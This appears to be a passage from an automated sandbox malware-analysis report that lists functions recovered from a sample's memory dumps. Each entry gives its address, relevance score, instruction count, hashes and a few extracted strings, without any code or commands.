Instruction ID: af6f2db563faf1fbc70f0bd2ff043cdc0bdea328750b13c4f11a62ae3a0d8702
Opcode Fuzzy Hash: 27f6bbec8036727024e9dcedb5eeb7bc2a37b11523ccee2cc54c10e6a7c09500
Instruction Fuzzy Hash: 2E11D671E0070A8EDB10DFADD8804DEFBB4EF48310F50866AD559B3211E730E695CB91

Function 077AFC08 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74e4697bbe10ebc64bdb3280243c93f16b25c02f68cac04bf992081618ee1756
Instruction ID: 7f489d73ab5c62d12c785e1eed81f1c0f60bac8c4db076b87875c535cd2dd6c4
Opcode Fuzzy Hash: 74e4697bbe10ebc64bdb3280243c93f16b25c02f68cac04bf992081618ee1756
Instruction Fuzzy Hash: FC119131A05604DFC708BBBEE59965E7FF5FB84340F4048A9E84593398DE34D818C395

Function 0137A710 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1a239af67c90aca69b8ecd8a76ebaa1de92549ec716bce889c7b9a20de20735
Instruction ID: 2c0526f4e0dc9e436438587e7ed7c8dd8317285c0e8aacafee815ead89e2f888
Opcode Fuzzy Hash: c1a239af67c90aca69b8ecd8a76ebaa1de92549ec716bce889c7b9a20de20735
Instruction Fuzzy Hash: BA114235B00204DFDB249F69D844B9DBBFAFB8C711F148129E916A7394DB719C10CBA0

Function 010ED1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1906761100.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10ed000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: a4ecd599db92a156d586c4c5b93172af7665d8d92c85295556682bc2b4fdbcc8
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: B411BB75904280DFDB16CF54D6C4B15FFA1FB84324F24C6AED8894B696C33AD40ACB62

Function 077A21DF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 070a17dfac3d1567e104d8b7faa8d898175a75d97a11c5feb6c547fe466ab51b
Instruction ID: 9f4e6f47a1e5599c7511c3000e34155477921f2a0f0400b091e067d2cd6bfbd8
Opcode Fuzzy Hash: 070a17dfac3d1567e104d8b7faa8d898175a75d97a11c5feb6c547fe466ab51b
Instruction Fuzzy Hash: 2D0149B3B156131BE785E6799C50A7FB6EFEFC4190B068939D824DB341DE30DC020294

Function 077A20DA Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5791477d01734c05a96f6c60b42de84a13d751a64f6396ef575c45fbc8db5ad
Instruction ID: eaf5a4dcd16a222a66c2339ad35cac7dafdeb4df099de2730fbecb785e00a76c
Opcode Fuzzy Hash: b5791477d01734c05a96f6c60b42de84a13d751a64f6396ef575c45fbc8db5ad
Instruction Fuzzy Hash: D701D4767006059FD320DB4AE841E97F7E9FFC4620B10C42AE559C7721C630E801C664

Function 0137BB70 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48aebb2cbb8f1dc92beffebc27c47407435dfdbda5ba87e339164099d3d11d1c
Instruction ID: 7fc35e2619d7b6f958b57c946d13f51121244e516fd3503f500f11d6e7e7fb0b
Opcode Fuzzy Hash: 48aebb2cbb8f1dc92beffebc27c47407435dfdbda5ba87e339164099d3d11d1c
Instruction Fuzzy Hash: CE01D672700119ABDF259E599814AFF7FEBEBC8750B148029F905D7248CA758C118BD0

Function 0137BB60 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945368814593042964e62f609418a2ba9070cddf5973cc3826cf28014bba15f1
Instruction ID: 2cc62fa8d769602ab4078ae9d07da19edd686ddebc5fbecd31123dae4d55e488
Opcode Fuzzy Hash: 945368814593042964e62f609418a2ba9070cddf5973cc3826cf28014bba15f1
Instruction Fuzzy Hash: C701D632600209AFDB25CE56D814AEF7FF6EB887A0B148029F944D7159DA7988168B90

Function 010DD79D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1906695560.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10dd000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 656d0f33d7f3d3eea9a151d449a538a0123364d22d73a7ffdac810680c846dd3
Instruction ID: 81d2f2bbaedf6d2acb23425311ac74c361d1595d0279078b6c56a502d290e437
Opcode Fuzzy Hash: 656d0f33d7f3d3eea9a151d449a538a0123364d22d73a7ffdac810680c846dd3
Instruction Fuzzy Hash: 1701A7315043409AE7214BA9CC84B66FBD8EF41660F14859AFD891E2C2D2799844CB72

Function 077A14E8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9a1a85f9f93557c7c1759929cf76af1e497f09646103ea8a67bc86c03c3be86
Instruction ID: 780dfd9839ba2d3b2fc48019dc7dd48f4eef2eb8173520be6eeaad8fa6b0189b
Opcode Fuzzy Hash: f9a1a85f9f93557c7c1759929cf76af1e497f09646103ea8a67bc86c03c3be86
Instruction Fuzzy Hash: 96F0E9717042085BEB495A69B42576E37E6ABC6510F58857FE905C7280CE245C0283A5

Function 010DD79C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1906695560.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10dd000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2df2a84b26f1e4ec518beac0be81972eca85f9502759aff2e803a11bbfeeb6c
Instruction ID: eca528b8d4b33642cfa086a0c21138e06f4a4c090087fb03aba29b3a2ca36e9b
Opcode Fuzzy Hash: e2df2a84b26f1e4ec518beac0be81972eca85f9502759aff2e803a11bbfeeb6c
Instruction Fuzzy Hash: 8EF06271404344AEE7218B59C984B62FFD8EB41664F18C59AED5C5F2C7C2799844CB71

Function 077ABC2C Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a96faead9bec3ba8828a3cbfee3d795fd0c4b85073d8535fb605837ae82e02
Instruction ID: d0348597df1fc1ba495c42496807f6f269f5446a38e1340248509a925aac99a8
Opcode Fuzzy Hash: 54a96faead9bec3ba8828a3cbfee3d795fd0c4b85073d8535fb605837ae82e02
Instruction Fuzzy Hash: 36F0F6B540C7C28FE7124B7094286983FB0BF4324570905EBD4D9C65B3DB35C80ACB12

Function 077A20E8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064c2be92ed1b9b602bc5e7bcb882b1cc414477a532dbc3ed95ee3eae0e2fc2
Instruction ID: c0a289041fd2500fe51dfee7301dde27830cf745d8900b5ec0f09f26379777e8
Opcode Fuzzy Hash: f064c2be92ed1b9b602bc5e7bcb882b1cc414477a532dbc3ed95ee3eae0e2fc2
Instruction Fuzzy Hash: D3E06D727002186FD3149A5A9C40EABFBEEFFD9620B25806AE504D7360CAB0AC0086A4

Function 0137B7DA Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de6bd1159a342c00de12a284bf845d398f05c64e5f8f8f1d63d5598150617061
Instruction ID: 4ba2bb5cff856cc0effdad550df9391c1a98e0077ead7c0e7cf63ea2a928bd21
Opcode Fuzzy Hash: de6bd1159a342c00de12a284bf845d398f05c64e5f8f8f1d63d5598150617061
Instruction Fuzzy Hash: 87E09239B403045BF63463766C21BBD66A7BBC4634F188815E9019B388DE3818014690

Function 077A2138 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d77cc3f570a88a7e40e410337613ab3090fbcc8d6d28238b299c8076d3f90a5
Instruction ID: c8762a75359831226768056ab3e52703a0b143223b13ec9edce9194ce704a860
Opcode Fuzzy Hash: 9d77cc3f570a88a7e40e410337613ab3090fbcc8d6d28238b299c8076d3f90a5
Instruction Fuzzy Hash: 90E08C363002006FC3108A0EEC88E06FBADFFC8630B50802AFA0DC7320CA30AC01CAA4

Function 077A14D7 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1267357cd99b77ff3ecf8f2fadeb6b5b171c7c0b91b0c24cb51dcf8cd097b6b2
Instruction ID: 57826d2b817b5ca1ea23496b8b5fffb4b1afe9e9d822106865255e1b8a10f474
Opcode Fuzzy Hash: 1267357cd99b77ff3ecf8f2fadeb6b5b171c7c0b91b0c24cb51dcf8cd097b6b2
Instruction Fuzzy Hash: 49E08C7A30011856DB289A59B484FFA67A9ABC4761F64803BE90AC3240DA710C0687E4

Function 077ABC1D Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b95da744eac98345281294aedba1bd44cce57991c71a029d16d6c70d6060d1e4
Instruction ID: a7d35d74498514b79ee28ed7c077369ee942d8bbdc597e19f8ce5466da2b7fc8
Opcode Fuzzy Hash: b95da744eac98345281294aedba1bd44cce57991c71a029d16d6c70d6060d1e4
Instruction Fuzzy Hash: 0EE0C7BA200302DFC7211F70E81D0293B74AF8120230491AAE42A816B8EF368008CB01

Function 0137A5F0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 580a9d480232c9062c160fa7d58d03966fb26d8d5f5dc6c6e75db2f9c18a7844
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 9CC0123324C1286AE235108E7C40EABBA8CD2C12B8B290137F51CC3200A8469C8001A8

Function 01377AE7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9695bf2157b42cde891b8ab51635ffcb3e33be47f7db12b983b4f0c9055f6290
Instruction ID: e0d466759547fcccac28a0e68360ce8666dc25d85cef837a671b9dcb158ba6aa
Opcode Fuzzy Hash: 9695bf2157b42cde891b8ab51635ffcb3e33be47f7db12b983b4f0c9055f6290
Instruction Fuzzy Hash: B5D02B3DA00302DFCF49E734E4501E87737EFD1200714817690070E665FD700C464702

Function 077A42D0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 614e6e10bb6a127553d43ba2fcea3109e4905a131258dc2b73099f3752491ab6
Instruction ID: 29e73b28dc8f8680d6b9eb8e39aa9187eebe51e1ac8c453cd47748fb2c4299fe
Opcode Fuzzy Hash: 614e6e10bb6a127553d43ba2fcea3109e4905a131258dc2b73099f3752491ab6
Instruction Fuzzy Hash: 52D0127590120DEBDF00DFB8E9505DD77B9FB85100B1046A9D50997210EA726E059751

Function 077A42CF Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c25a0b18aea9377b1104d6c4885819ca9aab5ae2205357b760a5a1d504011aa
Instruction ID: 580b98666eac5e57cc03f7739e3d050aa23174030b5e2a1dd44a5e1f8d577270
Opcode Fuzzy Hash: 6c25a0b18aea9377b1104d6c4885819ca9aab5ae2205357b760a5a1d504011aa
Instruction Fuzzy Hash: 28E0C271D00208EFCF00DFB8E9004EC77B5FB85200B2043A9D40AE7210DA321E059B00

Function 0137A7BD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0acbf8a5f05e5e18f3effc50b7b1ab0cece3023ce3c4b41724c6dca0064c64
Instruction ID: 7d1c027543e0d295c7db82575723433ec98e21e85dbc71e0768fb5c4d3195cf0
Opcode Fuzzy Hash: ca0acbf8a5f05e5e18f3effc50b7b1ab0cece3023ce3c4b41724c6dca0064c64
Instruction Fuzzy Hash: 49D0677BB40008DFCB149F98E8409DDB7B6FB98221B548516E915A3264C6319921DB90

Function 01377AF8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 051e24b26c1c9269a912be8b563f10d614b8afadce740b141fd479e4d8d77e81
Instruction ID: ff8939a3e8b30e40bb4d36214ce9464ae4be259de9648aa2ecc71862cc0a24c9
Opcode Fuzzy Hash: 051e24b26c1c9269a912be8b563f10d614b8afadce740b141fd479e4d8d77e81
Instruction Fuzzy Hash: 82C01239400707CBDF55F775F885599732BEEC0104744D531A0060E219FE7468464692

Non-executed Functions

Function 00F41218 Relevance: 2.8, Strings: 2, Instructions: 298COMMON

Download Yara Rule

Strings

PHq, xrefs: 00F41403
PHq, xrefs: 00F414DB

Memory Dump Source

Source File: 00000000.00000002.1906400077.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 730f53c1bf10512b5a0a16e321bb64202badaa6397a9cf2f880e2faf2f378cf0
Instruction ID: 790d5deecc15d4a35dd4ac1b61870f724a7dc13312e4fe2e13596a1e6ffbd0cb
Opcode Fuzzy Hash: 730f53c1bf10512b5a0a16e321bb64202badaa6397a9cf2f880e2faf2f378cf0
Instruction Fuzzy Hash: 62D1B634A00604CFDB14DF69C598AA9BBF1BF8D711F2580A8E806EB365DB31AD41DF60

Function 08F013F0 Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

#HBF, xrefs: 08F0157F
w*S, xrefs: 08F01568

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: #HBF$w*S
API String ID: 0-2996935253
Opcode ID: 32740230dbabb744278d576c35c7528320a02a52c6aaced0bf8756a369b3843f
Instruction ID: 64c1a3fc1ee5eeb60da2bae7f2ba27d29dc70752af81805128a171e6e524854c
Opcode Fuzzy Hash: 32740230dbabb744278d576c35c7528320a02a52c6aaced0bf8756a369b3843f
Instruction Fuzzy Hash: 5161E275E05209CFCB08CFA9D5845EEFBF2EF89311F24956AD419BB264D3309A818F64

Function 08F01400 Relevance: 2.7, Strings: 2, Instructions: 167COMMON

Download Yara Rule

Strings

#HBF, xrefs: 08F0157F
#HBF, xrefs: 08F01578

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: #HBF$#HBF
API String ID: 0-136798975
Opcode ID: 393681e92d26f86da4346175b6ff96233548f3a039626c0a78b4c2da00b3b268
Instruction ID: aceae7397fc74113557e5f81380ceddb41c8fe6a54608c4bb84fab407aefef72
Opcode Fuzzy Hash: 393681e92d26f86da4346175b6ff96233548f3a039626c0a78b4c2da00b3b268
Instruction Fuzzy Hash: 7261E175E05209CFCB08CFA9D9845EEFBF2FB89311F24952AD419BB264D3309A418F64

Function 08F00E10 Relevance: 2.7, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 08F00EEE
@, xrefs: 08F00EE7

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-693420146
Opcode ID: b5741f9ad5fb6fcf391e3186eda771b194ccec79ab7e9700167945bf1ebbb2d8
Instruction ID: 8e995082c31301d8a3f298bda7241eff5d9354bdc5c8f720f19a2c7cfa748802
Opcode Fuzzy Hash: b5741f9ad5fb6fcf391e3186eda771b194ccec79ab7e9700167945bf1ebbb2d8
Instruction Fuzzy Hash: 916127B5D0560ADFCB04CFA9D5816AEFBB2BF88341F14802AD415BB384DB389A41DF94

Function 08F011B9 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

A{]z, xrefs: 08F012AB
}\%G, xrefs: 08F0121A

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: A{]z$}\%G
API String ID: 0-4271377017
Opcode ID: 402002e2e066bddbbb904865700a18248643396a02940b08006db895bda120e0
Instruction ID: b20e99dfaff4d1b9326c2a47e049461df5fae02773f50a782e64b314065e32d6
Opcode Fuzzy Hash: 402002e2e066bddbbb904865700a18248643396a02940b08006db895bda120e0
Instruction Fuzzy Hash: 0C41DAB1E0420ADFDB08CFAAC5405AEFBF2BF89315F24D46AC515E7254E3349A819F64

Function 08F011C8 Relevance: 2.6, Strings: 2, Instructions: 113COMMON

Download Yara Rule

Strings

A{]z, xrefs: 08F012AB
}\%G, xrefs: 08F0121A

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: A{]z$}\%G
API String ID: 0-4271377017
Opcode ID: f4651500dd3e9eaa6a173d1c838fc98bef768f9291c831bba879bd5518f8e962
Instruction ID: 81495161a4cf48aea882eeb0110719c5bda60824f3e748d63dc11fe4d01accbb
Opcode Fuzzy Hash: f4651500dd3e9eaa6a173d1c838fc98bef768f9291c831bba879bd5518f8e962
Instruction Fuzzy Hash: D641EBB1D0420ADFDB08CFAAC5405AEFBF2BB89315F24D42AC515F7254E7349A819FA4

Function 07802F80 Relevance: 2.1, Strings: 1, Instructions: 807COMMON

Download Yara Rule

Strings

F, xrefs: 07803959

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-2945319695
Opcode ID: 7fb8a580dd4423fc6007790ae10eefb6c72f00223408520d71f75d756524efd1
Instruction ID: b83d725d0b3bab5ff43cd6a5d76a75938aca69077b888aab83e0d48df38c1bb9
Opcode Fuzzy Hash: 7fb8a580dd4423fc6007790ae10eefb6c72f00223408520d71f75d756524efd1
Instruction Fuzzy Hash: E862DF71F043148FCB04EBB9D8A479EBFB2AF8A300F5185AAD449E7355DA389C45CB91

Function 08F00B20 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

yS^Z, xrefs: 08F00C4A

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: yS^Z
API String ID: 0-4128205011
Opcode ID: ed7152e3151905f54ff8bda5e93cddb7f2e56bc321620b23d5ea0358f9512345
Instruction ID: 7856d7e0049842233d46661d5f2f065db970d1f38516bed3bff4788cf1f19dd7
Opcode Fuzzy Hash: ed7152e3151905f54ff8bda5e93cddb7f2e56bc321620b23d5ea0358f9512345
Instruction Fuzzy Hash: 3A71F2B4D0060ADFCB44CFA9D580AAEFBB2FF89311F148529D415EB254CB34A9829F95

Function 08F00B10 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

yS^Z, xrefs: 08F00C4A

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: yS^Z
API String ID: 0-4128205011
Opcode ID: 667997640fab717480e67e6682230dd676436519c4b0abf45fa1f6eaa961b405
Instruction ID: 917415c722872bb70aa6dfd984b0be516e61e292ef7685d535f49aa9e8dbc6e1
Opcode Fuzzy Hash: 667997640fab717480e67e6682230dd676436519c4b0abf45fa1f6eaa961b405
Instruction Fuzzy Hash: B46115B5E0160ACFCB04CFA9D580AAEFBB2FF89311F148526D415E7354CB34A9829F95

Function 00F408B8 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1906400077.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6ea85cb43a43260eca977b6c29c3ad3058a1d97a17c53a904fa062464259b19
Instruction ID: 3761af5c28ddc754768f56019e19d266e151c513921ad4e9510e15201ce8b685
Opcode Fuzzy Hash: f6ea85cb43a43260eca977b6c29c3ad3058a1d97a17c53a904fa062464259b19
Instruction Fuzzy Hash: 50D1AD31B016018FDB29DB76C4507AE7BE6AF89714F14446EDA46CB2A1DF38EC01C750

Function 014EF3E0 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b296d51a53a08ea3ae862e4cb50f547491fe5299c0d457ab9ac69df8280bcb6
Instruction ID: 6439a95e664fe312078e8266506064e09eaec5ee2aeb89f273814a1e590c34b0
Opcode Fuzzy Hash: 6b296d51a53a08ea3ae862e4cb50f547491fe5299c0d457ab9ac69df8280bcb6
Instruction Fuzzy Hash: 9212A2F24117468BE332DF66EA482893BF1F745318F648209D2621B2F9D7B8528BDF45

Function 077A0007 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ccdd63a8c5af3b9950b4937c0ff87450af5edad942acda346966e939ca84f39
Instruction ID: f7d0d6ac6d2ba7c11b9a295585d6363590a9f9701d95745fcdf693cdccaad60e
Opcode Fuzzy Hash: 2ccdd63a8c5af3b9950b4937c0ff87450af5edad942acda346966e939ca84f39
Instruction Fuzzy Hash: D6E11935D2075A8ACB11EB64D990ADDF771FF96300F50879AE44A3B224EB706AC5CF41

Function 077A0040 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 824c131c479409c3a7694ea4b8087d84e0e7916315c0d43bf7765e080d162617
Instruction ID: b28b4f806db2d72bcf87200331b8d22bfc8cde2de29995e01dfcc6ff847dfa86
Opcode Fuzzy Hash: 824c131c479409c3a7694ea4b8087d84e0e7916315c0d43bf7765e080d162617
Instruction Fuzzy Hash: 6DD1E635D2075A8ACB10EB64D990ADDF771FF95300F60C79AE54A3B224EB706AC5CB81

Function 08F09DB0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d2479021207214fbeaf9f079fe7f1614d18f045ceb12e913cea9ce97200ce8f
